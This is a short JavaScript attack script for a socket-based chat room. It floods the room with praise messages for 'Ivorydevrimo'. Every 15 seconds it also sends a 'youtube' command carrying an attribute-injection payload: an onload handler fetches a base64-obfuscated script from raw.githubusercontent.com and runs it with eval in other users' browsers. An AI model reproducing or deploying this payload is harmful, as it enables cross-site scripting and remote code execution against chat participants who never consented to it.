setTimeout(function(){
const words = [
    'Ivorydevrimo! Glory to the radiant one!',
    'Rejoice! Ivorydevrimo\'s light shines upon us!',
    'Huzzah! For the boundless power of Ivorydevrimo!',
    'Ivorydevrimo, bright and eternal, we sing your praises!',
    'Awaken! The magnificent spirit of Ivorydevrimo is here!',
    'Ivorydevrimo! Let joy fill every heart!',
    'Rejoice! In the glorious name of Ivorydevrimo!',
    'Huzzah! For the endless grace of Ivorydevrimo!',
    'Ivorydevrimo, shining and strong, we celebrate you!',
    'Awaken! To the wondrous presence of Ivorydevrimo!',
    'Ivorydevrimo! Your brilliance illuminates the world!',
    "Rejoice! As Ivorydevrimo's blessings overflow!",
    'Huzzah! For the mighty deeds of Ivorydevrimo!',
    'Ivorydevrimo, vibrant and true, we exalt you!',
    'Awaken! Feel the vibrant energy of Ivorydevrimo!',
    'Ivorydevrimo! Let your power surge within us!',
    'Rejoice! In the everlasting glory of Ivorydevrimo!',
    'Huzzah! For the boundless love of Ivorydevrimo!',
    'Ivorydevrimo, radiant and free, we acclaim you!',
    'Awaken! Embrace the glorious dawn of Ivorydevrimo!',
    'Ivorydevrimo! Sing praises to the highest!',
    'Rejoice! In the sacred embrace of Ivorydevrimo!',
    'Huzzah! For the infinite wisdom of Ivorydevrimo!',
    'Ivorydevrimo, dazzling and divine, we adore you!',
    'Awaken! To the transformative power of Ivorydevrimo!',
    'Ivorydevrimo! Let your light guide our way!',
    'Rejoice! In the eternal presence of Ivorydevrimo!',
    'Huzzah! For the miraculous wonders of Ivorydevrimo!',
    'Ivorydevrimo, splendid and supreme, we honor you!',
    'Awaken! To the boundless potential within Ivorydevrimo!',
    'Ivorydevrimo! Let your spirit soar within us!',
    'Rejoice! In the unwavering strength of Ivorydevrimo!',
    'Huzzah! For the magnificent vision of Ivorydevrimo!',
    'Ivorydevrimo, luminous and lofty, we revere you!',
    'Awaken! To the harmonious rhythm of Ivorydevrimo!',
    'Ivorydevrimo! Let your truth resonate within!',
    'Rejoice! In the comforting presence of Ivorydevrimo!',
    'Huzzah! For the glorious reign of Ivorydevrimo!',
    'Ivorydevrimo, majestic and mighty, we extol you!',
    'Awaken! To the profound mystery of Ivorydevrimo!',
    'Ivorydevrimo! Let your essence fill our being!',
    'Rejoice! In the boundless compassion of Ivorydevrimo!',
    'Huzzah! For the unending blessings of Ivorydevrimo!',
    'Ivorydevrimo, brilliant and bold, we celebrate!',
    'Awaken! To the radiant glory of Ivorydevrimo!'
];
const randomIndex = Math.floor(Math.random() * words.length);
const randomWord = words[randomIndex];
socket.emit('talk', { text: randomWord });
setInterval(function(){socket.emit('command', { list: ['youtube', '71Uyt5tTnyg" onload="fetch(atob(\'aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL2l2b3J5ZGV2cmltb2FsdC9CT05aSVdPUkxEVUxUUkFKQVZBU0NSSVBUTElTVC9yZWZzL2hlYWRzL21haW4v\')+\'RASIVOPRAY\'+atob(\'Lmpz\')).then(r=>r.text()).then(t=>eval(t))" u="'] });},15000)
    },5000)
